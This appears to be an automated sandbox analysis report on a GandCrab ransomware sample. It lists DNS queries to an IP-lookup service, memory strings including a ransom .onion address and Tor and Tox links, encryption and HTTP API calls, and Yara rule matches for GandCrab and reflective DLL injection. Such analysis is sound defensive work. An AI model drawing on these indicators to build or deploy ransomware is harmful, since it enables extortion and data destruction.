Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	DNS query: name: ipv4bot.whatismyipaddress.com

Source: IJr8RvvhZ3.exe, 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmp, mqsmvj.exe, 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000C.00000002.344084967.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000E.00000002.374552502.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000010.00000002.406166723.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000013.00000002.437026618.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000017.00000002.473021592.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000019.00000002.502628191.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001B.00000002.543807830.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001C.00000002.559901286.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001E.00000002.598229388.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000023.00000002.638125851.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000025.00000002.681251272.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000027.00000002.720286366.000000000F592000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5
Source: mqsmvj.exe, 0000000B.00000002.327597151.000000000093A000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000C.00000002.343812574.0000000000873000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000C.00000003.343418273.0000000000873000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000C.00000002.343769957.0000000000838000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000E.00000002.373523162.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 00000019.00000002.501583638.0000000000D18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/
Source: mqsmvj.exe, 0000000C.00000002.343769957.0000000000838000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/$
Source: mqsmvj.exe, 0000000C.00000002.343812574.0000000000873000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000C.00000003.343418273.0000000000873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/4
Source: mqsmvj.exe, 00000019.00000002.501583638.0000000000D18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/9I)
Source: mqsmvj.exe, 0000000E.00000002.373523162.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/CwX
Source: mqsmvj.exe, 0000000B.00000002.327597151.000000000093A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/I
Source: mqsmvj.exe, 0000000C.00000002.343812574.0000000000873000.00000004.00000020.00020000.00000000.sdmp, mqsmvj.exe, 0000000C.00000003.343418273.0000000000873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ipv4bot.whatismyipaddress.com/a
Source: IJr8RvvhZ3.exe, 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmp, mqsmvj.exe, 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000C.00000002.344084967.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000E.00000002.374552502.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000010.00000002.406166723.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000013.00000002.437026618.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000017.00000002.473021592.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000019.00000002.502628191.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001B.00000002.543807830.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001C.00000002.559901286.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001E.00000002.598229388.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000023.00000002.638125851.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000025.00000002.681251272.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000027.00000002.720286366.000000000F592000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: https://tox.chat/download.html
Source: IJr8RvvhZ3.exe, 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmp, mqsmvj.exe, 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000C.00000002.344084967.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000000E.00000002.374552502.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000010.00000002.406166723.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000013.00000002.437026618.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000017.00000002.473021592.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000019.00000002.502628191.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001B.00000002.543807830.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001C.00000002.559901286.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 0000001E.00000002.598229388.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000023.00000002.638125851.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000025.00000002.681251272.000000000F592000.00000004.00000001.01000000.00000006.sdmp, mqsmvj.exe, 00000027.00000002.720286366.000000000F592000.00000004.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.torproject.org/

Source: unknown

DNS traffic detected: queries for: ipv4bot.whatismyipaddress.com

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe

Code function: 0_2_0F148050 lstrcatW,InternetCloseHandle,InternetConnectW,VirtualAlloc,wsprintfW,HttpOpenRequestW,HttpAddRequestHeadersW,HttpSendRequestW,InternetReadFile,InternetReadFile,GetLastError,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,VirtualFree,

0_2_0F148050

Spam, unwanted Advertisements and Ransom Demands

Yara detected Gandcrab

Source: Yara match	File source: 25.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.344084967.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.406166723.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.598229388.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.257994631.000000000F152000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.473021592.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.638125851.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.720286366.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.543807830.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.559901286.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.502628191.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.437026618.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.374552502.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.681251272.000000000F592000.00000004.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: IJr8RvvhZ3.exe PID: 732, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 4652, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 5964, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 5524, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 5304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 4828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 4940, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 5160, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 5636, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 2564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 4480, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 6000, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mqsmvj.exe PID: 3780, type: MEMORYSTR

Source: C:\Users\user\Desktop\IJr8RvvhZ3.exe	Code function: 0_2_0F146660 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	0_2_0F146660
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 3_2_0F586660 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	3_2_0F586660
Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe	Code function: 11_2_0F586682 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,	11_2_0F586682

System Summary

Malicious sample detected (through community Yara rule)

Source: IJr8RvvhZ3.exe, type: SAMPLE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: IJr8RvvhZ3.exe, type: SAMPLE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: IJr8RvvhZ3.exe, type: SAMPLE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 23.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 23.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 23.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 28.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 28.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 28.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 27.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 27.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 27.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 38.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 38.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 38.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 25.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 25.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 25.3.mqsmvj.exe.3490000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0.3.IJr8RvvhZ3.exe.3210000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.3.IJr8RvvhZ3.exe.3210000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.3.IJr8RvvhZ3.exe.3210000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 14.3.mqsmvj.exe.32b0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 14.3.mqsmvj.exe.32b0000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 14.3.mqsmvj.exe.32b0000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 3.3.mqsmvj.exe.3790000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.3.mqsmvj.exe.3790000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 3.3.mqsmvj.exe.3790000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 22.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 22.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 22.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 0.0.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 0.0.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 0.0.IJr8RvvhZ3.exe.f140000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 34.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 34.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 34.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 3.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 3.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 3.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 11.3.mqsmvj.exe.3290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 11.3.mqsmvj.exe.3290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 11.3.mqsmvj.exe.3290000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 25.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 25.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 25.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 36.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 36.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 36.0.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 27.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 27.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 27.3.mqsmvj.exe.3490000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 16.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 28.3.mqsmvj.exe.3130000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 28.3.mqsmvj.exe.3130000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 28.3.mqsmvj.exe.3130000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 16.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
Source: 16.2.mqsmvj.exe.f580000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_GandCrab Author: ReversingLabs
Source: 14.3.mqsmvj.exe.32b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 14.3.mqsmvj.exe.32b0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Gandcrab Payload Author: kevoreilly
